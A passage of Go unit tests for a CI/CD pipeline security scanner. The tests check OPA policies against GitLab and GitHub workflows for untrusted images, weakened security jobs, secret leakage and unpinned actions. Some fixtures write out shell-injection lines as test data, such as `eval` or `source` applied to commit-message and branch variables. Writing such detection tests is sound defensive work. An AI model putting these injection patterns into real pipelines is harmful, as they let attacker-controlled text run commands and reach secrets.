+// TestIssue401_HardcodedJobs flags jobs whose origin is "hardcoded".
+// parseGitLabCI does not know about origins (that data comes from the
+// full pipelineOriginData), so this test builds the IR directly.
+func TestIssue401_HardcodedJobs(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Jobs: []ir.Job{
+ {Name: "build", OriginKind: "hardcoded"},
+ {Name: "lint", OriginKind: "component"},
+ {Name: "deploy"}, // unknown origin β not flagged
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := []string{}
+ for _, f := range findings {
+ if f.Code == "ISSUE-401" {
+ hits = append(hits, f.Job)
+ }
+ }
+ if len(hits) != 1 || hits[0] != "build" {
+ t.Fatalf("expected only [build], got %v", hits)
+ }
+}
+
+// TestIssue101_ImageAuthorizedSources flags jobs using images from
+// untrusted registries. Exercises the Docker-Hub-official-image
+// fast-path and the trustedUrls glob matcher. Uses hand-built IRs
+// because parseGitLabCI does not extract Image.Registry.
+func TestIssue101_ImageAuthorizedSources(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "imageAuthorizedSources": map[string]any{
+ "trustedUrls": []string{"registry.company.com/*"},
+ "trustDockerHubOfficial": true,
+ },
+ }
+
+ cases := []struct {
+ name string
+ image ir.Image
+ expected bool
+ }{
+ {"official_docker_hub", ir.Image{Name: "python", Tag: "3.12", Registry: "docker.io"}, false},
+ {"company_registry", ir.Image{Name: "registry.company.com/app", Tag: "1.0"}, false},
+ {"untrusted_registry", ir.Image{Name: "attacker/unknown", Tag: "1.0", Registry: "ghcr.io"}, true},
+ }
+ for _, tc := range cases {
+ t.Run(tc.name, func(t *testing.T) {
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Jobs: []ir.Job{{Name: "build", Image: &tc.image}},
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ found := false
+ for _, f := range findings {
+ if f.Code == "ISSUE-101" {
+ found = true
+ }
+ }
+ if found != tc.expected {
+ t.Fatalf("%s: expected violation=%v, got %v (findings=%+v)", tc.name, tc.expected, found, findings)
+ }
+ })
+ }
+}
+
+// TestIssue410_SecurityJobsWeakened flags SAST-like jobs with
+// allow_failure: true or when: manual.
+func TestIssue410_SecurityJobsWeakened(t *testing.T) {
+ cfg := map[string]any{
+ "securityJobsWeakened": map[string]any{
+ "securityJobPatterns": []string{"sast", "*-sast", "secret_detection"},
+ "allowFailureMustBeFalse": true,
+ "whenMustNotBeManual": true,
+ },
+ }
+ runGitLabPolicyCases(t, "ISSUE-410", []policyCase{
+ {"violation_allow_failure.gitlab-ci.yml", []string{"sast"}},
+ {"violation_manual.gitlab-ci.yml", []string{"sast"}},
+ {"clean.gitlab-ci.yml", nil},
+ }, cfg)
+}
+
+// TestIssue205_JobVariableOverride flags pipeline jobs that set a
+// variable protected by .plumber.yaml.
+func TestIssue205_JobVariableOverride(t *testing.T) {
+ cfg := map[string]any{
+ "jobVariablesOverride": map[string]any{
+ "protectedVariables": []string{"PROD_TOKEN"},
+ },
+ }
+ runGitLabPolicyCases(t, "ISSUE-205", []policyCase{
+ {"violation_override.gitlab-ci.yml", []string{"deploy"}},
+ {"clean.gitlab-ci.yml", nil},
+ }, cfg)
+}
+
+// TestIssue404_WildcardForbiddenVersion locks in legacy go-wildcard
+// parity: a `v*` pattern in forbiddenVersions must match `v1.0.0`
+// just like the legacy gitlab.CheckItemMatchToPatterns helper.
+// Hardcoded includes are skipped regardless of ref.
+func TestIssue404_WildcardForbiddenVersion(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "includesForbiddenVersions": map[string]any{
+ "forbiddenVersions": []string{"v*"},
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Includes: []ir.Include{
+ {Kind: "component", Source: "plumber/a", Ref: "v1.0.0"}, // matches v*
+ {Kind: "component", Source: "plumber/b", Ref: "1.0.0"}, // no match
+ {Kind: "hardcoded", Source: "plumber/c", Ref: "v9.9.9"}, // skipped (kind)
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := []string{}
+ for _, f := range findings {
+ if f.Code == "ISSUE-404" {
+ hits = append(hits, f.Job)
+ }
+ }
+ if len(hits) != 1 || hits[0] != "plumber/a" {
+ t.Fatalf("expected only [plumber/a] flagged via wildcard, got %v", hits)
+ }
+}
+
+// TestIssue204_SourceAndDotSourcing covers the two patterns that were
+// missing from the Rego port: `source script.sh` and `. script.sh`.
+// Both re-parse the file as shell, so a tainted variable used in one
+// is just as dangerous as `eval`.
+func TestIssue204_SourceAndDotSourcing(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "unsafeVariableExpansion": map[string]any{
+ "dangerousVariables": []string{"CI_COMMIT_MESSAGE"},
+ "allowedPatterns": []string{},
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Jobs: []ir.Job{
+ {Name: "src", Scripts: []string{`source ${CI_COMMIT_MESSAGE}`}},
+ {Name: "dot", Scripts: []string{`. ${CI_COMMIT_MESSAGE}`}},
+ {Name: "comment", Scripts: []string{`# eval $CI_COMMIT_MESSAGE`}}, // skipped
+ {Name: "echo", Scripts: []string{`echo $CI_COMMIT_MESSAGE`}}, // safe
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := []string{}
+ for _, f := range findings {
+ if f.Code == "ISSUE-204" {
+ hits = append(hits, f.Job)
+ }
+ }
+ sort.Strings(hits)
+ want := []string{"dot", "src"}
+ if !stringSlicesEqual(hits, want) {
+ t.Fatalf("expected %v, got %v", want, hits)
+ }
+}
+
+// TestIssue204_VariableWordBoundary locks in the legacy regex
+// `\$VAR(?:[^a-zA-Z0-9_]|$)` so `$CI_COMMIT_MESSAGE` is flagged but
+// `$CI_COMMIT_MESSAGE_OTHER` is not. The naive `contains` form (the
+// previous Rego implementation) over-matched.
+func TestIssue204_VariableWordBoundary(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "unsafeVariableExpansion": map[string]any{
+ "dangerousVariables": []string{"CI_COMMIT_BRANCH"},
+ "allowedPatterns": []string{},
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Jobs: []ir.Job{
+ {Name: "exact", Scripts: []string{`eval "$CI_COMMIT_BRANCH"`}},
+ {Name: "prefix-only", Scripts: []string{`eval "$CI_COMMIT_BRANCH_OTHER"`}},
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := []string{}
+ for _, f := range findings {
+ if f.Code == "ISSUE-204" {
+ hits = append(hits, f.Job)
+ }
+ }
+ if len(hits) != 1 || hits[0] != "exact" {
+ t.Fatalf("expected only [exact] flagged, got %v", hits)
+ }
+}
+
+// TestIssue412_DindLatestAndRegistryPrefix locks in two legacy
+// behaviours of isDindImage: `docker:latest` is dind, and a
+// registry-prefixed `/docker:dind` is dind. A non-`docker`
+// image with `dind` in the tag (e.g. `nginx:dind`) must NOT match.
+func TestIssue412_DindLatestAndRegistryPrefix(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Jobs: []ir.Job{
+ {Name: "latest", Services: []ir.Image{{Name: "docker", Tag: "latest"}}},
+ {Name: "registry-dind", Services: []ir.Image{{Name: "registry.gitlab.com/group/docker", Tag: "dind"}}},
+ {Name: "bare-docker", Services: []ir.Image{{Name: "docker"}}}, // no tag β not dind
+ {Name: "nginx-dind", Services: []ir.Image{{Name: "nginx", Tag: "dind"}}}, // wrong name β not dind
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := []string{}
+ for _, f := range findings {
+ if f.Code == "ISSUE-412" {
+ hits = append(hits, f.Job)
+ }
+ }
+ sort.Strings(hits)
+ want := []string{"latest", "registry-dind"}
+ if !stringSlicesEqual(hits, want) {
+ t.Fatalf("expected %v, got %v", want, hits)
+ }
+}
+
+// TestIssue412_OneFindingPerJob mirrors the legacy `break` after the
+// first matched dind service. Even with two dind services on the same
+// job, the policy must emit a single finding.
+func TestIssue412_OneFindingPerJob(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Jobs: []ir.Job{{
+ Name: "build",
+ Services: []ir.Image{
+ {Name: "docker", Tag: "27-dind"},
+ {Name: "docker", Tag: "dind"},
+ },
+ }},
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ count := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-412" {
+ count++
+ }
+ }
+ if count != 1 {
+ t.Fatalf("expected exactly 1 ISSUE-412 finding, got %d", count)
+ }
+}
+
+// TestIssue203_TruthyAndCaseInsensitive locks in legacy parity:
+// - Variable name comparison is case-insensitive (`ci_debug_trace`
+// matches `CI_DEBUG_TRACE`).
+// - Truthy values are `true`, `1`, `yes` (case-insensitive,
+// trimmed).
+// - When forbiddenVariables is empty / cfg absent, no findings fire
+// (the legacy GetConf path skips the control).
+func TestIssue203_TruthyAndCaseInsensitive(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "debugTrace": map[string]any{
+ "forbiddenVariables": []string{"CI_DEBUG_TRACE"},
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Jobs: []ir.Job{
+ {Name: "lower", Variables: map[string]string{"ci_debug_trace": "true"}},
+ {Name: "one", Variables: map[string]string{"CI_DEBUG_TRACE": "1"}},
+ {Name: "yes-padded", Variables: map[string]string{"CI_DEBUG_TRACE": " YES "}},
+ {Name: "off", Variables: map[string]string{"CI_DEBUG_TRACE": "false"}},
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := []string{}
+ for _, f := range findings {
+ if f.Code == "ISSUE-203" {
+ hits = append(hits, f.Job)
+ }
+ }
+ sort.Strings(hits)
+ want := []string{"lower", "one", "yes-padded"}
+ if !stringSlicesEqual(hits, want) {
+ t.Fatalf("expected %v, got %v", want, hits)
+ }
+
+ // No cfg β no findings (legacy parity: control is skipped when
+ // forbiddenVariables is empty / unset).
+ noCfg, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate (no cfg): %v", err)
+ }
+ for _, f := range noCfg {
+ if f.Code == "ISSUE-203" {
+ t.Fatalf("expected no ISSUE-203 findings without cfg, got %+v", f)
+ }
+ }
+}
+
+// TestIssue101_VarNotationAndUnknownRegistry locks in two legacy
+// parity guarantees:
+// - `${VAR}` and `$VAR` notations normalize to the same form before
+// glob matching, so a pattern written either way matches a
+// reference written the other way.
+// - The "unknown" registry literal emitted by the GitLab image
+// collector is treated as no registry, so the trustedUrls glob
+// compares against just `name:tag`.
+func TestIssue101_VarNotationAndUnknownRegistry(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+
+ t.Run("var_notation_normalised", func(t *testing.T) {
+ cfg := map[string]any{
+ "imageAuthorizedSources": map[string]any{
+ "trustedUrls": []string{"registry.company.com/${PROJECT}/*"},
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Jobs: []ir.Job{{
+ Name: "build",
+ // Reference written with $PROJECT (no braces) β must still match.
+ Image: &ir.Image{Name: "$PROJECT/app", Tag: "1.0", Registry: "registry.company.com"},
+ }},
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ for _, f := range findings {
+ if f.Code == "ISSUE-101" {
+ t.Fatalf("expected match after var-notation normalisation, got finding %+v", f)
+ }
+ }
+ })
+
+ t.Run("unknown_registry_treated_as_no_registry", func(t *testing.T) {
+ cfg := map[string]any{
+ "imageAuthorizedSources": map[string]any{
+ "trustedUrls": []string{"local-image:*"},
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Jobs: []ir.Job{{
+ Name: "build",
+ Image: &ir.Image{Name: "local-image", Tag: "1.0", Registry: "unknown"},
+ }},
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ for _, f := range findings {
+ if f.Code == "ISSUE-101" {
+ t.Fatalf("expected unknown-registry image to match `local-image:*` glob, got %+v", f)
+ }
+ }
+ })
+}
+
+type policyCase struct {
+ file string
+ expectedJobHits []string
+}
+
+// runGitLabPolicyCases is a shared test harness for policies exercised
+// via GitLab .gitlab-ci.yml fixtures under
+// testdata//gitlab/. cfg (optional) is passed as input.config.
+func runGitLabPolicyCases(t *testing.T, code string, cases []policyCase, cfg map[string]any) {
+ t.Helper()
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ dir := filepath.Join("testdata", code, "gitlab")
+ for _, c := range cases {
+ t.Run(c.file, func(t *testing.T) {
+ data, err := os.ReadFile(filepath.Join(dir, c.file))
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ pipeline := parseGitLabCI(t, data)
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := make([]string, 0)
+ for _, f := range findings {
+ if f.Code != code {
+ continue
+ }
+ hits = append(hits, f.Job)
+ }
+ sort.Strings(hits)
+ expected := append([]string(nil), c.expectedJobHits...)
+ sort.Strings(expected)
+ if !stringSlicesEqual(hits, expected) {
+ t.Fatalf("%s/%s: expected %v, got %v", code, c.file, expected, hits)
+ }
+ })
+ }
+}
+
+func stringSlicesEqual(a, b []string) bool {
+ if len(a) != len(b) {
+ return false
+ }
+ for i := range a {
+ if a[i] != b[i] {
+ return false
+ }
+ }
+ return true
+}
+
+// TestIssue408_ComponentMissing flags DNF groups whose required
+// components are missing from the resolved include list. The Go
+// control behaviour is to emit one finding per missing component per
+// group β the Rego port does the same.
+func TestIssue408_ComponentMissing(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "pipelineMustIncludeComponent": map[string]any{
+ "requiredGroups": []any{
+ []any{"components/sast/sast", "components/secret-detection/secret-detection"},
+ []any{"your-org/full-security/full-security"},
+ },
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Includes: []ir.Include{
+ {Kind: "component", Source: "gitlab.example.com/components/sast/sast@1.0.0", Path: "components/sast/sast"},
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := map[string]bool{}
+ for _, f := range findings {
+ if f.Code == "ISSUE-408" {
+ hits[f.Job] = true
+ }
+ }
+ if !hits["components/secret-detection/secret-detection"] {
+ t.Fatalf("expected secret-detection flagged, got %v", hits)
+ }
+ if !hits["your-org/full-security/full-security"] {
+ t.Fatalf("expected full-security flagged, got %v", hits)
+ }
+ if hits["components/sast/sast"] {
+ t.Fatalf("unexpected flag on present component: %v", hits)
+ }
+}
+
+// TestIssue409_ComponentOverridden flags required components whose
+// jobs were overridden with forbidden CI/CD keys.
+func TestIssue409_ComponentOverridden(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "pipelineMustIncludeComponent": map[string]any{
+ "requiredGroups": []any{
+ []any{"components/sast/sast"},
+ },
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Includes: []ir.Include{
+ {
+ Kind: "component",
+ Source: "gitlab.example.com/components/sast/sast@1.0.0",
+ Path: "components/sast/sast",
+ OverriddenJobs: []ir.OverriddenJob{
+ {Name: "sast", Keys: []string{"script", "rules"}},
+ },
+ },
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-409" {
+ hits++
+ }
+ }
+ if hits != 1 {
+ t.Fatalf("expected 1 ISSUE-409 finding, got %d", hits)
+ }
+}
+
+// TestIssue405_TemplateMissing flags DNF groups whose required
+// templates are missing. Template includes (project/remote/local/
+// template) are considered; components and hardcoded origins are
+// ignored.
+func TestIssue405_TemplateMissing(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "pipelineMustIncludeTemplate": map[string]any{
+ "requiredGroups": []any{
+ []any{"templates/go/go", "templates/trivy/trivy"},
+ },
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Includes: []ir.Include{
+ {Kind: "project", Source: "group/templates/templates/go/go.yml", Path: "group/templates/templates/go/go.yml", AltPath: "templates/go/go"},
+ // a component should NOT satisfy a template requirement
+ {Kind: "component", Source: "gitlab.example.com/components/trivy/trivy@1.0.0", Path: "components/trivy/trivy"},
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := map[string]bool{}
+ for _, f := range findings {
+ if f.Code == "ISSUE-405" {
+ hits[f.Job] = true
+ }
+ }
+ if !hits["templates/trivy/trivy"] {
+ t.Fatalf("expected trivy template flagged, got %v", hits)
+ }
+ if hits["templates/go/go"] {
+ t.Fatalf("unexpected flag on present template: %v", hits)
+ }
+}
+
+// TestIssue406_TemplateOverridden flags required templates whose
+// jobs were overridden locally.
+func TestIssue406_TemplateOverridden(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ cfg := map[string]any{
+ "pipelineMustIncludeTemplate": map[string]any{
+ "requiredGroups": []any{
+ []any{"templates/go/go"},
+ },
+ },
+ }
+ pipeline := &ir.NormalizedPipeline{
+ Provider: ir.ProviderGitLab,
+ Includes: []ir.Include{
+ {
+ Kind: "project",
+ Source: "group/templates/templates/go/go.yml",
+ Path: "group/templates/templates/go/go.yml",
+ AltPath: "templates/go/go",
+ OverriddenJobs: []ir.OverriddenJob{
+ {Name: "build", Keys: []string{"script"}},
+ },
+ },
+ },
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := 0
+ for _, f := range findings {
+ if f.Code == "ISSUE-406" {
+ hits++
+ }
+ }
+ if hits != 1 {
+ t.Fatalf("expected 1 ISSUE-406 finding, got %d", hits)
+ }
+}
+
+// parseGitHubStepsUses extracts `steps[].uses` entries from a workflow
+// job. Only `uses` is needed for the currently ported policies; the
+// accompanying `with:` block is left empty since no rule reads it yet.
+func parseGitHubStepsUses(v any) []ir.Action {
+ list, ok := v.([]any)
+ if !ok {
+ return nil
+ }
+ out := make([]ir.Action, 0, len(list))
+ for _, item := range list {
+ step, ok := toStringMap(item)
+ if !ok {
+ continue
+ }
+ uses, ok := step["uses"].(string)
+ if !ok || uses == "" {
+ continue
+ }
+ out = append(out, ir.Action{Uses: uses})
+ }
+ return out
+}
+
+// TestIssue302_SecretsInherit flags reusable-workflow calls that
+// forward every caller secret via `secrets: inherit`. Explicit
+// per-secret mappings and regular (non-reusable) jobs stay silent.
+func TestIssue302_SecretsInherit(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_inherit.yml", []string{"violation_inherit/call"}},
+ {"clean_named.yml", nil},
+ {"clean_regular_job.yml", nil},
+ }
+
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ for _, tc := range cases {
+ t.Run(tc.fixture, func(t *testing.T) {
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+ src := filepath.Join("testdata", "ISSUE-302", "github", tc.fixture)
+ data, err := os.ReadFile(src)
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ if err := os.WriteFile(filepath.Join(wfDir, tc.fixture), data, 0o644); err != nil {
+ t.Fatal(err)
+ }
+ pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil {
+ t.Fatalf("scan: %v", err)
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := make([]string, 0)
+ for _, f := range findings {
+ if f.Code != "ISSUE-302" {
+ continue
+ }
+ hits = append(hits, f.Job)
+ }
+ sort.Strings(hits)
+ expected := append([]string(nil), tc.expectedHits...)
+ sort.Strings(expected)
+ if !stringSlicesEqual(hits, expected) {
+ t.Fatalf("%s: expected %v, got %v", tc.fixture, expected, hits)
+ }
+ })
+ }
+}
+
+// TestIssue301_OverprovisionedSecrets flags jobs that serialise the
+// entire `secrets` context via toJson/toJSON and pass it into a
+// step's script, env binding, or action `with:` input. The scoped
+// pattern `${{ secrets.NAME }}` stays silent.
+func TestIssue301_OverprovisionedSecrets(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_env.yml", []string{"violation_env/call"}},
+ {"violation_run_script.yml", []string{"violation_run_script/dump"}},
+ {"violation_with.yml", []string{"violation_with/deploy"}},
+ {"clean_scoped.yml", nil},
+ }
+
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ for _, tc := range cases {
+ t.Run(tc.fixture, func(t *testing.T) {
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+ src := filepath.Join("testdata", "ISSUE-301", "github", tc.fixture)
+ data, err := os.ReadFile(src)
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ if err := os.WriteFile(filepath.Join(wfDir, tc.fixture), data, 0o644); err != nil {
+ t.Fatal(err)
+ }
+ pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil {
+ t.Fatalf("scan: %v", err)
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := make([]string, 0)
+ for _, f := range findings {
+ if f.Code != "ISSUE-301" {
+ continue
+ }
+ hits = append(hits, f.Job)
+ }
+ sort.Strings(hits)
+ expected := append([]string(nil), tc.expectedHits...)
+ sort.Strings(expected)
+ if !stringSlicesEqual(hits, expected) {
+ t.Fatalf("%s: expected %v, got %v", tc.fixture, expected, hits)
+ }
+ })
+ }
+}
+
+// TestIssue209_GitHubEnvInjection flags `run:` steps that write a
+// user-controlled GitHub template expression into $GITHUB_ENV or
+// $GITHUB_PATH. The env-binding pattern (bind through env: then
+// dereference the shell variable on the redirect line) must stay
+// silent β it is the canonical remediation.
+func TestIssue209_GitHubEnvInjection(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_event_to_env.yml", []string{"violation_event_to_env/build"}},
+ {"violation_head_ref_to_path.yml", []string{"violation_head_ref_to_path/deploy"}},
+ {"clean_env_binding.yml", nil},
+ {"clean_literal.yml", nil},
+ }
+
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ for _, tc := range cases {
+ t.Run(tc.fixture, func(t *testing.T) {
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+ src := filepath.Join("testdata", "ISSUE-209", "github", tc.fixture)
+ data, err := os.ReadFile(src)
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ if err := os.WriteFile(filepath.Join(wfDir, tc.fixture), data, 0o644); err != nil {
+ t.Fatal(err)
+ }
+ pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil {
+ t.Fatalf("scan: %v", err)
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := make([]string, 0)
+ for _, f := range findings {
+ if f.Code != "ISSUE-209" {
+ continue
+ }
+ hits = append(hits, f.Job)
+ }
+ sort.Strings(hits)
+ expected := append([]string(nil), tc.expectedHits...)
+ sort.Strings(expected)
+ if !stringSlicesEqual(hits, expected) {
+ t.Fatalf("%s: expected %v, got %v", tc.fixture, expected, hits)
+ }
+ })
+ }
+}
+
+// TestIssue105_ContainerHardcodedCredentials flags
+// jobs..container.credentials.password literals. Template
+// expressions (${{ secrets.X }}) pass through; missing credentials
+// block is a no-op. Exercises the production ScanGitHubWorkflows
+// collector so the test covers the full extraction path.
+func TestIssue105_ContainerHardcodedCredentials(t *testing.T) {
+ cases := []struct {
+ fixture string
+ expectedHits []string
+ }{
+ {"violation_literal.yml", []string{"violation_literal/build"}},
+ {"clean_secret_ref.yml", nil},
+ {"clean_no_credentials.yml", nil},
+ }
+
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ for _, tc := range cases {
+ t.Run(tc.fixture, func(t *testing.T) {
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+ src := filepath.Join("testdata", "ISSUE-105", "github", tc.fixture)
+ data, err := os.ReadFile(src)
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
+ if err := os.WriteFile(filepath.Join(wfDir, tc.fixture), data, 0o644); err != nil {
+ t.Fatal(err)
+ }
+ pipeline, _, err := collector.ScanGitHubWorkflows("owner/repo", "main", tmp)
+ if err != nil {
+ t.Fatalf("scan: %v", err)
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+ if err != nil {
+ t.Fatalf("evaluate: %v", err)
+ }
+ hits := make([]string, 0)
+ for _, f := range findings {
+ if f.Code != "ISSUE-105" {
+ continue
+ }
+ hits = append(hits, f.Job)
+ }
+ sort.Strings(hits)
+ expected := append([]string(nil), tc.expectedHits...)
+ sort.Strings(expected)
+ if !stringSlicesEqual(hits, expected) {
+ t.Fatalf("%s: expected %v, got %v", tc.fixture, expected, hits)
+ }
+ })
+ }
+}
+
+// TestIssue104_ActionUnpinned flags third-party GitHub Actions
+// references that use mutable refs (tags, branches) instead of
+// commit SHAs. Exercises the opt-in config, trusted-owners
+// exemption, and SHA/local exemptions.
+func TestIssue104_ActionUnpinned(t *testing.T) {
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ t.Fatalf("load embedded policies: %v", err)
+ }
+ dir := filepath.Join("testdata", "ISSUE-104", "github")
+ cases := []struct {
+ fixture string
+ cfg map[string]any
+ wantCount int
+ }{
+ {"violation_tag_ref.yml", map[string]any{"actionsMustBePinnedByCommitSha": map[string]any{}}, 3},
+ {"clean_sha_pinned.yml", map[string]any{"actionsMustBePinnedByCommitSha": map[string]any{}}, 0},
+ {"trusted_owner_tag.yml", map[string]any{"actionsMustBePinnedByCommitSha": map[string]any{"trustedOwners": []any{"actions", "github"}}}, 1},
+ {"violation_tag_ref.yml", nil, 0},
+ }
+ for _, tc := range cases {
+ t.Run(tc.fixture, func(t *testing.T) {
+ data, err := os.ReadFile(filepath.Join(dir, tc.fixture))
+ if err != nil {
+ t.Fatalf("read fixture: %v", err)
+ }
